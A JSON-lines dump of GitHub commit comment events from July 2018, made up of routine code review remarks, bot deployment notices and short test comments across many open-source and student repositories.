{"id":"8011119875","type":"CommitCommentEvent","actor":{"login":"janschreiber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29816331,"position":61,"line":25834,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"9d94c1fc3ff1311206f962c1518cb559a0568b9c","created_at":"2018-07-24T15:51:21Z","updated_at":"2018-07-24T15:51:21Z","author_association":"MEMBER","body":"Ich kann beide Seiten verstehen, aber ich nehme es mal raus. Ich fühle mich auch nicht wohl damit."}},"created_at":"2018-07-24T15:51:21Z"}
{"id":"8011124078","type":"CommitCommentEvent","actor":{"login":"whchung"},"repo":{"name":"ROCmSoftwarePlatform/tensorflow-upstream"},"payload":{"comment":{"id":29816342,"position":null,"line":null,"path":null,"commit_id":"ce255942a57bd4047caebe89e0a15ff6c5488f62","created_at":"2018-07-24T15:52:00Z","updated_at":"2018-07-24T15:52:00Z","author_association":"COLLABORATOR","body":"it's very interesting IR emitters aren't built within `build_python3` script even though XLA is supposed to be enabled by default.\r\n\r\nfor densenet it's easier to understand as it's in the example of a contrib module."}},"created_at":"2018-07-24T15:52:00Z"}
{"id":"8011124540","type":"CommitCommentEvent","actor":{"login":"Gioghuit"},"repo":{"name":"Gioghuit/Ember.js"},"payload":{"comment":{"id":29816344,"position":null,"line":null,"path":null,"commit_id":"db4423ebbe531fe52f51c0f5e000dbfee74a55d9","created_at":"2018-07-24T15:52:06Z","updated_at":"2018-07-24T15:52:06Z","author_association":"OWNER","body":"Welcome to Ember.Js My first code with Ember.js Framework JoinMe!"}},"created_at":"2018-07-24T15:52:06Z"}
{"id":"8011130097","type":"CommitCommentEvent","actor":{"login":"albIN7"},"repo":{"name":"albIN7/Mini-project"},"payload":{"comment":{"id":29816355,"position":4,"line":3,"path":"mhSite/mhWebsite/models.py","commit_id":"b33117e7152b6d50da7703f9184f90372f40fb16","created_at":"2018-07-24T15:52:56Z","updated_at":"2018-07-24T15:52:56Z","author_association":"OWNER","body":"# Create your models here."}},"created_at":"2018-07-24T15:52:56Z"}
{"id":"8011130967","type":"CommitCommentEvent","actor":{"login":"jucjkee"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29816358,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T15:53:05Z","updated_at":"2018-07-24T15:53:05Z","author_association":"NONE","body":"It is really great project"}},"created_at":"2018-07-24T15:53:05Z"}
{"id":"8011131142","type":"CommitCommentEvent","actor":{"login":"crazylittlepolka"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29816359,"position":null,"line":null,"path":null,"commit_id":"c4b43702554a8bf732eef6264c7053c370c6b201","created_at":"2018-07-24T15:53:07Z","updated_at":"2018-07-24T15:53:07Z","author_association":"NONE","body":"I had the same problem, and the only solution for me was include in \r\n\r\nclass App extends Components{\r\n\r\n  constructor(props) {\r\n    super(props);\r\n    this.state = { contacts: [ ] };\r\n  }\r\n}"}},"created_at":"2018-07-24T15:53:07Z"}
{"id":"8011131878","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29816360,"position":371,"line":904,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T15:53:13Z","updated_at":"2018-07-24T15:53:13Z","author_association":"NONE","body":"I will delete this comment. \r\nI spoke with Shlomi and he agree with changing MTU of p-port if it less than new MTU of l-port."}},"created_at":"2018-07-24T15:53:13Z"}
{"id":"8011136195","type":"CommitCommentEvent","actor":{"login":"pmarks"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29816367,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-24T15:53:51Z","updated_at":"2018-07-24T15:53:51Z","author_association":"CONTRIBUTOR","body":"This should be OK -- it should be based on the len() / size_hint() method of NodeKmerIter (https://github.com/10XGenomics/rust-debruijn/compare/avi#diff-a0c94d0c1540ede7afa6f3cbdb8c8948R1005), not the len() of the actual Node."}},"created_at":"2018-07-24T15:53:51Z"}
{"id":"8011137054","type":"CommitCommentEvent","actor":{"login":"darkdh"},"repo":{"name":"brave/muon"},"payload":{"comment":{"id":29816370,"position":14,"line":1370,"path":"patches/master_patch.patch","commit_id":"3e3d703a710f6c9cb8b6636ab4a4e898ae5f0ef7","created_at":"2018-07-24T15:54:00Z","updated_at":"2018-07-24T15:54:00Z","author_association":"MEMBER","body":"I meant just this line ` NOTREACHED();` which will cause error logging"}},"created_at":"2018-07-24T15:54:00Z"}
{"id":"8011141075","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29816376,"position":null,"line":null,"path":null,"commit_id":"1f9892801fc176d2d75d5b4ea2aca969a186399d","created_at":"2018-07-24T15:54:37Z","updated_at":"2018-07-24T15:54:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-shs-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-shs-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-shs-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T15:54:37Z"}
{"id":"8011145369","type":"CommitCommentEvent","actor":{"login":"TheJayWright"},"repo":{"name":"ProctorU/storm"},"payload":{"comment":{"id":29816385,"position":21,"line":29,"path":"Gemfile","commit_id":"3421e8c17817177fb2d3f83e7ce58d6252f898f8","created_at":"2018-07-24T15:55:19Z","updated_at":"2018-07-24T15:55:19Z","author_association":"NONE","body":"Since you've already added the gem `minitest-rails-capybara`, you have no need for this capybara gem as well."}},"created_at":"2018-07-24T15:55:19Z"}
{"id":"8011145464","type":"CommitCommentEvent","actor":{"login":"dantaub"},"repo":{"name":"api-platform/api-doc-parser"},"payload":{"comment":{"id":29816386,"position":34,"line":34,"path":"src/swagger/handleJson.js","commit_id":"0c999c9013ec3b8fa7a091fd36014088fea4760d","created_at":"2018-07-24T15:55:20Z","updated_at":"2018-07-24T15:55:20Z","author_association":"NONE","body":"there is not always a definition for every title. Often, the title and the route names differ, and are linked by 'ref'  -- take for example the petstore definition:\r\n\r\nhttps://petstore.swagger.io/v2/swagger.json"}},"created_at":"2018-07-24T15:55:20Z"}
{"id":"8011152372","type":"CommitCommentEvent","actor":{"login":"nomeata"},"repo":{"name":"nomeata/free-theorems-static-webui"},"payload":{"comment":{"id":29816396,"position":22,"line":86,"path":"free-theorems-0.3.2.0/free-theorems.cabal","commit_id":"922ff52fa72e9696299d699a23050468c45124c4","created_at":"2018-07-24T15:56:25Z","updated_at":"2018-07-24T15:56:25Z","author_association":"OWNER","body":"Naughty me!"}},"created_at":"2018-07-24T15:56:25Z"}
{"id":"8011156768","type":"CommitCommentEvent","actor":{"login":"remram44"},"repo":{"name":"remram44/planets"},"payload":{"comment":{"id":29816403,"position":5,"line":4,"path":"pluto.txt","commit_id":"366d4918e32f94d76f96a0499a1d90eeb983d6f7","created_at":"2018-07-24T15:57:07Z","updated_at":"2018-07-24T15:57:07Z","author_association":"OWNER","body":"Oops!"}},"created_at":"2018-07-24T15:57:07Z"}
{"id":"8011158063","type":"CommitCommentEvent","actor":{"login":"Chityanj"},"repo":{"name":"RevengeOS-Devices/android_device_leeco_msm8996-common"},"payload":{"comment":{"id":29816405,"position":null,"line":null,"path":null,"commit_id":"0c08eb4068a38da3886b5853ce6d298017ed7b41","created_at":"2018-07-24T15:57:19Z","updated_at":"2018-07-24T15:57:19Z","author_association":"NONE","body":"What beesh what happened "}},"created_at":"2018-07-24T15:57:19Z"}
{"id":"8011161383","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29816414,"position":5,"line":10,"path":"src/components/Dashboard.js","commit_id":"a8af9ebfd8f26b33b2b96c27ee12d7a876ee9067","created_at":"2018-07-24T15:57:52Z","updated_at":"2018-07-24T15:57:52Z","author_association":"COLLABORATOR","body":"We should try and name our import the same as our file and the class it is exporting so here try `import Users from './Users';`"}},"created_at":"2018-07-24T15:57:52Z"}
{"id":"8011165709","type":"CommitCommentEvent","actor":{"login":"Jonas-Watt"},"repo":{"name":"Jonas-Watt/test"},"payload":{"comment":{"id":29816431,"position":null,"line":null,"path":null,"commit_id":"91fbf89f470850ef517f665d72be1ce63a0e627d","created_at":"2018-07-24T15:58:34Z","updated_at":"2018-07-24T15:58:34Z","author_association":"OWNER","body":"Toll!"}},"created_at":"2018-07-24T15:58:34Z"}
{"id":"8011168815","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29816437,"position":33,"line":41,"path":"src/components/Dashboard.js","commit_id":"a8af9ebfd8f26b33b2b96c27ee12d7a876ee9067","created_at":"2018-07-24T15:59:04Z","updated_at":"2018-07-24T15:59:04Z","author_association":"COLLABORATOR","body":"We are destructuring props on line 34 so use this to get the users prop ."}},"created_at":"2018-07-24T15:59:04Z"}
{"id":"8011170544","type":"CommitCommentEvent","actor":{"login":"RusseII"},"repo":{"name":"pomkos/angel"},"payload":{"comment":{"id":29816441,"position":null,"line":null,"path":null,"commit_id":"0a89291e23ada3330998b2bca7de17e532d79a73","created_at":"2018-07-24T15:59:21Z","updated_at":"2018-07-24T15:59:21Z","author_association":"COLLABORATOR","body":"nice find"}},"created_at":"2018-07-24T15:59:21Z"}
{"id":"8011175445","type":"CommitCommentEvent","actor":{"login":"trouba"},"repo":{"name":"opendatasoft/ods-documentation-landing-page"},"payload":{"comment":{"id":29816449,"position":16,"line":19,"path":"src/components/app/header/header.vue","commit_id":"5ed6d530b4ae056cce2124a07e87514ec89e9b49","created_at":"2018-07-24T16:00:11Z","updated_at":"2018-07-24T16:00:11Z","author_association":"NONE","body":"I think for the Help Hub, \"OpenDataSoft HelpHub Logo\" should be enough"}},"created_at":"2018-07-24T16:00:11Z"}
{"id":"8011177404","type":"CommitCommentEvent","actor":{"login":"mbonsma"},"repo":{"name":"UofTCoders/council"},"payload":{"comment":{"id":29816457,"position":null,"line":null,"path":null,"commit_id":"33195b654cf0a6f4174ca00c06beed7e390ec3f6","created_at":"2018-07-24T16:00:26Z","updated_at":"2018-07-24T16:00:26Z","author_association":"MEMBER","body":"The receipt file date is not correct, the date of purchase was December 2017 as is written in this PR: https://github.com/UofTCoders/council/pull/220/files"}},"created_at":"2018-07-24T16:00:26Z"}
{"id":"8011177660","type":"CommitCommentEvent","actor":{"login":"ChrisC0210"},"repo":{"name":"ChrisC0210/cameralux"},"payload":{"comment":{"id":29816458,"position":null,"line":null,"path":null,"commit_id":"52bce33a6597295e42832f62e6d1270ab2b6332b","created_at":"2018-07-24T16:00:28Z","updated_at":"2018-07-24T16:00:28Z","author_association":"OWNER","body":"https://chrisc0210.github.io/cameralux/"}},"created_at":"2018-07-24T16:00:28Z"}
{"id":"8011177982","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"zephyrproject-rtos/sdk-ng"},"payload":{"comment":{"id":29816460,"position":null,"line":null,"path":null,"commit_id":"ac670112c4b78f38d953189a17275159dd17015c","created_at":"2018-07-24T16:00:30Z","updated_at":"2018-07-24T16:00:30Z","author_association":"NONE","body":"@nashif Maybe worth adding mention of ARC to README.md?"}},"created_at":"2018-07-24T16:00:30Z"}
{"id":"8011178738","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29816461,"position":4,"line":40,"path":"src/reducers/Reducer.js","commit_id":"a8af9ebfd8f26b33b2b96c27ee12d7a876ee9067","created_at":"2018-07-24T16:00:37Z","updated_at":"2018-07-24T16:00:37Z","author_association":"COLLABORATOR","body":"These Author actions are unnecessary and not part of the functionality you need to implement for the project."}},"created_at":"2018-07-24T16:00:37Z"}
{"id":"8011183292","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29816468,"position":null,"line":null,"path":null,"commit_id":"80ae8c35d9d9a19dee1367e7ed90f54c5a4ecae9","created_at":"2018-07-24T16:01:20Z","updated_at":"2018-07-24T16:01:20Z","author_association":"CONTRIBUTOR","body":"@asp2insp https://github.com/facebook/buck/pull/1976"}},"created_at":"2018-07-24T16:01:20Z"}
{"id":"8011184292","type":"CommitCommentEvent","actor":{"login":"trouba"},"repo":{"name":"opendatasoft/ods-documentation-landing-page"},"payload":{"comment":{"id":29816469,"position":10,"line":32,"path":"src/components/app/header/header.vue","commit_id":"88fdd7dfedf975d91fd967f44d5c487675b8115b","created_at":"2018-07-24T16:01:29Z","updated_at":"2018-07-24T16:01:29Z","author_association":"NONE","body":" think for the Help Hub, \"OpenDataSoft HelpHub Logo\" should be enough"}},"created_at":"2018-07-24T16:01:29Z"}
{"id":"8011188383","type":"CommitCommentEvent","actor":{"login":"fschulze"},"repo":{"name":"gotcha/devpi"},"payload":{"comment":{"id":29816472,"position":null,"line":null,"path":null,"commit_id":"8f255268e904ae834c3b52a9b1c3baa69e463d0f","created_at":"2018-07-24T16:02:10Z","updated_at":"2018-07-24T16:02:10Z","author_association":"COLLABORATOR","body":"The vendored HTMLPage from pip currently in devpi_common should be added to devpi_server instead. It's not used in devpi-client anymore. The old code shouldn't be removed though, that can be done in the next major release of devpi-common."}},"created_at":"2018-07-24T16:02:10Z"}
{"id":"8011188476","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29816473,"position":643,"line":309,"path":"main.go","commit_id":"bb9f0578dc7701daa71dd1da4806bf1d46e825fa","created_at":"2018-07-24T16:02:11Z","updated_at":"2018-07-24T16:02:11Z","author_association":"COLLABORATOR","body":"If you can refactory the code such way, it will be easier to read\r\n* having a class to extract the attributes from http.Request. such as\r\n  struct ExtractAttributes {\r\n    r    httpRequest\r\n}\r\n\r\nstring (t* ExtractAttributes)getTarrget string, err ;\r\n \r\n"}},"created_at":"2018-07-24T16:02:11Z"}
{"id":"8011190577","type":"CommitCommentEvent","actor":{"login":"Glorious-Past"},"repo":{"name":"Glorious-Past/glorious-past.github.io"},"payload":{"comment":{"id":29816483,"position":null,"line":null,"path":null,"commit_id":"fcfd885c0e3507fbd04eb2cfe3b4e5838bf4a70f","created_at":"2018-07-24T16:02:30Z","updated_at":"2018-07-24T16:02:30Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-24T16:02:30Z"}
{"id":"8011191740","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29816489,"position":21,"line":21,"path":"test/test_User.js","commit_id":"a8af9ebfd8f26b33b2b96c27ee12d7a876ee9067","created_at":"2018-07-24T16:02:41Z","updated_at":"2018-07-24T16:02:41Z","author_association":"COLLABORATOR","body":"You should make this test more explicit to include the actual User information."}},"created_at":"2018-07-24T16:02:41Z"}
{"id":"8011191745","type":"CommitCommentEvent","actor":{"login":"chris-rands"},"repo":{"name":"chris-rands/profiles_from_protein_families"},"payload":{"comment":{"id":29816490,"position":104,"line":142,"path":"rules/mmseqs.smk","commit_id":"37a0ed3786dbc9a86081218eeca81c5881b4cd58","created_at":"2018-07-24T16:02:41Z","updated_at":"2018-07-24T16:02:41Z","author_association":"OWNER","body":"ok, I'm also not sure, maybe add a comment here (I see you put a comment later). for sampling with replacement like you currently have i think `np.random.choice` or `random.choices` would be the best function options"}},"created_at":"2018-07-24T16:02:41Z"}
{"id":"8011199093","type":"CommitCommentEvent","actor":{"login":"myronliu347"},"repo":{"name":"museui/muse-ui"},"payload":{"comment":{"id":29816500,"position":null,"line":null,"path":null,"commit_id":"147050d7709632577710d0e04ef5d7584de279b8","created_at":"2018-07-24T16:03:56Z","updated_at":"2018-07-24T16:03:56Z","author_association":"MEMBER","body":"#1087 #1086"}},"created_at":"2018-07-24T16:03:56Z"}
{"id":"8011201077","type":"CommitCommentEvent","actor":{"login":"fepegar"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29816502,"position":98,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"6a8012e30952ff7e990956f11a892349387cd974","created_at":"2018-07-24T16:04:16Z","updated_at":"2018-07-24T16:04:16Z","author_association":"NONE","body":"Hi @cpinter \r\n\r\nI think \"so that every voxel is a *cube*\" would be more accurate."}},"created_at":"2018-07-24T16:04:16Z"}
{"id":"8011201205","type":"CommitCommentEvent","actor":{"login":"baylessj"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29816503,"position":29,"line":29,"path":"v5/okapi/tutorials/walkthrough/autonomous-movement.rst","commit_id":"cdb3317c9f003ea712f98ad005f2d0d3bc0a2ebd","created_at":"2018-07-24T16:04:17Z","updated_at":"2018-07-24T16:04:17Z","author_association":"CONTRIBUTOR","body":"So I could just pass the port number in and it would work?"}},"created_at":"2018-07-24T16:04:17Z"}
{"id":"8011204102","type":"CommitCommentEvent","actor":{"login":"qiwzhang"},"repo":{"name":"MoSBanapple/ShopApp-Server"},"payload":{"comment":{"id":29816510,"position":32,"line":32,"path":"price_test.go","commit_id":"bb9f0578dc7701daa71dd1da4806bf1d46e825fa","created_at":"2018-07-24T16:04:46Z","updated_at":"2018-07-24T16:04:46Z","author_association":"COLLABORATOR","body":"It seems line from 22 to 32 are repeated for each test.   Can you make it a function to re-use the code\r\nAlso make it smaller test, such as\r\nTestPriceCreate()\r\nTestPriceUpdate()\r\nTestPriceDelete()"}},"created_at":"2018-07-24T16:04:46Z"}
{"id":"8011204670","type":"CommitCommentEvent","actor":{"login":"springyh"},"repo":{"name":"springyh/test"},"payload":{"comment":{"id":29816511,"position":null,"line":null,"path":null,"commit_id":"09bc3d888d7db1a0d994d4763e8dd2699ca36d03","created_at":"2018-07-24T16:04:51Z","updated_at":"2018-07-24T16:04:51Z","author_association":"OWNER","body":"呵呵,第二行测试代码"}},"created_at":"2018-07-24T16:04:51Z"}
{"id":"8011215184","type":"CommitCommentEvent","actor":{"login":"fedorov"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29816525,"position":98,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"6a8012e30952ff7e990956f11a892349387cd974","created_at":"2018-07-24T16:06:40Z","updated_at":"2018-07-24T16:06:40Z","author_association":"MEMBER","body":"Perhaps even better - \"Resample the volume to have isotropic spacing\", this would also be consistent with the nomenclature used in \"Crop volume\"."}},"created_at":"2018-07-24T16:06:40Z"}
{"id":"8011216754","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29816530,"position":null,"line":null,"path":null,"commit_id":"51b3998d0e17012719d82b1798545bb7c01cd298","created_at":"2018-07-24T16:06:55Z","updated_at":"2018-07-24T16:06:55Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [popoverpar](https://popoverpar-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://popoverpar-static-docs.pantheonsite.io/docs/support)\n- [/docs/style-guide](https://popoverpar-static-docs.pantheonsite.io/docs/style-guide)\n"}},"created_at":"2018-07-24T16:06:55Z"}
{"id":"8011222044","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29816539,"position":null,"line":null,"path":null,"commit_id":"95fba505fd4968b236ee2141e6fe314efdbc3ed8","created_at":"2018-07-24T16:07:48Z","updated_at":"2018-07-24T16:07:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-530](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-530).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-530-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T16:07:48Z"}
{"id":"8011225164","type":"CommitCommentEvent","actor":{"login":"infrastation"},"repo":{"name":"RackTables/racktables"},"payload":{"comment":{"id":29816551,"position":null,"line":null,"path":null,"commit_id":"0c1b0b11c930518f5a98cfa826af266105c37bcd","created_at":"2018-07-24T16:08:20Z","updated_at":"2018-07-24T16:08:20Z","author_association":"MEMBER","body":"So now you can configure a 802.1Q port as \"T+1\" and deploy it, right?"}},"created_at":"2018-07-24T16:08:20Z"}
{"id":"8011232970","type":"CommitCommentEvent","actor":{"login":"sethbrenith"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":29816567,"position":50,"line":3323,"path":"lib/Backend/IRBuilder.cpp","commit_id":"f909b6144e7531819ee974a33d29ef7f08f4da2b","created_at":"2018-07-24T16:09:41Z","updated_at":"2018-07-24T16:09:41Z","author_association":"MEMBER","body":"Nit: I generally prefer declaring variables down at their first assignment, but that's a personal preference so it's fine as-is."}},"created_at":"2018-07-24T16:09:41Z"}
{"id":"8011238506","type":"CommitCommentEvent","actor":{"login":"springyh"},"repo":{"name":"springyh/test"},"payload":{"comment":{"id":29816580,"position":1,"line":1,"path":"测试git.txt","commit_id":"09bc3d888d7db1a0d994d4763e8dd2699ca36d03","created_at":"2018-07-24T16:10:38Z","updated_at":"2018-07-24T16:10:38Z","author_association":"OWNER","body":"呵呵,这是测试的第二行代码"}},"created_at":"2018-07-24T16:10:38Z"}
{"id":"8011239487","type":"CommitCommentEvent","actor":{"login":"mikedane"},"repo":{"name":"canjs/can-route"},"payload":{"comment":{"id":29816581,"position":null,"line":null,"path":null,"commit_id":"b78b2e6a1c1375c08cfb55ee0541aa79c9fea493","created_at":"2018-07-24T16:10:48Z","updated_at":"2018-07-24T16:10:48Z","author_association":"NONE","body":"There was one particularly mysterious bug in the `urlData.md` file, the link\r\n\r\n`[can-route-pushstate]`\r\n\r\non line 8 seemed to be broken for some reason, it was displaying the actually html of the link instead of the link.\r\n\r\n<img width=\"1243\" alt=\"screen shot 2018-07-24 at 12 09 10 pm\" src=\"https://user-images.githubusercontent.com/13106307/43151703-8c40a12e-8f3a-11e8-9b3a-73661422ca2d.png\">\r\n\r\n I tried to fix it a few different ways including creating an absolute link `[can-route-pushstate](https://canjs.com/doc/can-route-pushstate.html)` but that didn't work. I just removed the link and bolded it for now. "}},"created_at":"2018-07-24T16:10:48Z"}
{"id":"8011242475","type":"CommitCommentEvent","actor":{"login":"ashmaroli"},"repo":{"name":"jekyll/Utterson"},"payload":{"comment":{"id":29816588,"position":5,"line":16,"path":"report","commit_id":"5419f0c267373948b38c1d7ba06daa93fa36b217","created_at":"2018-07-24T16:11:19Z","updated_at":"2018-07-24T16:11:19Z","author_association":"MEMBER","body":"you can avoid initializing and traversing an Array instance by using `File.basename`\r\n```ruby\r\nsite = File.basename(site)\r\n```"}},"created_at":"2018-07-24T16:11:19Z"}
{"id":"8011243473","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29816590,"position":23,"line":23,"path":"src/main/java/com/ewp/crm/models/AssignSkypeCall.java","commit_id":"082f972fc21057c0bfb29d717a6cc1d961f10fb1","created_at":"2018-07-24T16:11:28Z","updated_at":"2018-07-24T16:11:28Z","author_association":"NONE","body":"удалить"}},"created_at":"2018-07-24T16:11:28Z"}
{"id":"8011244356","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29816592,"position":40,"line":40,"path":"src/main/java/com/ewp/crm/models/AssignSkypeCall.java","commit_id":"082f972fc21057c0bfb29d717a6cc1d961f10fb1","created_at":"2018-07-24T16:11:39Z","updated_at":"2018-07-24T16:11:39Z","author_association":"NONE","body":"дел"}},"created_at":"2018-07-24T16:11:39Z"}
{"id":"8011245184","type":"CommitCommentEvent","actor":{"login":"Tschebel"},"repo":{"name":"justimmo/php-sdk"},"payload":{"comment":{"id":29816596,"position":null,"line":null,"path":null,"commit_id":"91531f691146e177ae243047bdbfb05f22871f0e","created_at":"2018-07-24T16:11:47Z","updated_at":"2018-07-24T16:11:47Z","author_association":"MEMBER","body":"@19Gerhard85 Den Commit habe ich reverted da dies vor einem Jahr explizit umgestellt wurde.\r\n\r\nKannst du dich noch daran erinnern was damals war, bzw warum es damals geändert wurde?\r\nc4270584996cf3980222c8d4731c4ce89aeb45ed"}},"created_at":"2018-07-24T16:11:47Z"}
{"id":"8011246672","type":"CommitCommentEvent","actor":{"login":"chrisprog20"},"repo":{"name":"einpraegsam/powermail"},"payload":{"comment":{"id":29816599,"position":null,"line":null,"path":null,"commit_id":"0eafb263573df0ae68b60cd7b95d67307d35cbea","created_at":"2018-07-24T16:12:03Z","updated_at":"2018-07-24T16:12:03Z","author_association":"NONE","body":"Great! :)\r\nThank you! :)"}},"created_at":"2018-07-24T16:12:03Z"}
{"id":"8011248739","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29816604,"position":null,"line":null,"path":null,"commit_id":"fd38569fa7be50f0cddc03d6d77c19ec33bfa0c8","created_at":"2018-07-24T16:12:24Z","updated_at":"2018-07-24T16:12:24Z","author_association":"COLLABORATOR","body":"#134"}},"created_at":"2018-07-24T16:12:24Z"}
{"id":"8011251614","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"Microsoft/vscode-languageserver-node"},"payload":{"comment":{"id":29816609,"position":null,"line":null,"path":null,"commit_id":"8be8741af1500c190817e767299b093aad5743db","created_at":"2018-07-24T16:12:55Z","updated_at":"2018-07-24T16:12:55Z","author_association":"CONTRIBUTOR","body":"Despite this, I get an exception when I omit `detail` with vscode-languageclient 4.4.0:\r\n\r\n![](https://i.imgur.com/MwwUoda.png)\r\n\r\nWith `detail: \"\"` it works fine."}},"created_at":"2018-07-24T16:12:55Z"}
{"id":"8011254088","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29816613,"position":null,"line":null,"path":null,"commit_id":"e01e4b41c1c48cb6c086913e6c4bd5b0d3c47e63","created_at":"2018-07-24T16:13:20Z","updated_at":"2018-07-24T16:13:20Z","author_association":"MEMBER","body":"@FRidh Do you think `pythonPackages.spyder` is needed? It's using `buildPythonApplication` anyway and I only know spyder as an application."}},"created_at":"2018-07-24T16:13:20Z"}
{"id":"8011260277","type":"CommitCommentEvent","actor":{"login":"PlaySnowi"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29816627,"position":null,"line":null,"path":null,"commit_id":"c4b43702554a8bf732eef6264c7053c370c6b201","created_at":"2018-07-24T16:14:21Z","updated_at":"2018-07-24T16:14:21Z","author_association":"NONE","body":"ok, so I found a solution to this. in this link https://github.com/udacity/reactnd-contacts-complete/commit/f794f553e4937f6b2afaab2acdb14c623d8eb8c1?diff=unified, in the penultimate comment, that guy says to run this in the terminal:\r\n\"npm i -g npm-check-updates\r\nncu -u --packageFile package.json\r\nnpm install\".\r\nThis works for me!"}},"created_at":"2018-07-24T16:14:21Z"}
{"id":"8011269791","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/git-friendly"},"payload":{"comment":{"id":29816645,"position":null,"line":null,"path":null,"commit_id":"7b81d239bf5657fb9909cb2755bdd95c58b67b3f","created_at":"2018-07-24T16:15:58Z","updated_at":"2018-07-24T16:15:58Z","author_association":"OWNER","body":"Ah my mistake, will check it out!\n\nOn Mon, Jul 23, 2018 at 12:33 PM Artem Sapegin <notifications@github.com>\nwrote:\n\n> There are in the comment in the beginning of the section ;-)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jamiew/git-friendly/commit/7b81d239bf5657fb9909cb2755bdd95c58b67b3f#commitcomment-29802757>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAHb7vhtU3IZB0GIB0cHAwMBRlU2hz4ks5uJfrJgaJpZM4VYSHV>\n> .\n>\n"}},"created_at":"2018-07-24T16:15:58Z"}
{"id":"8011275429","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29816657,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-24T16:16:56Z","updated_at":"2018-07-24T16:16:56Z","author_association":"NONE","body":"ooh , gotta test it soon\r\nbut our stock doesn't support it "}},"created_at":"2018-07-24T16:16:56Z"}
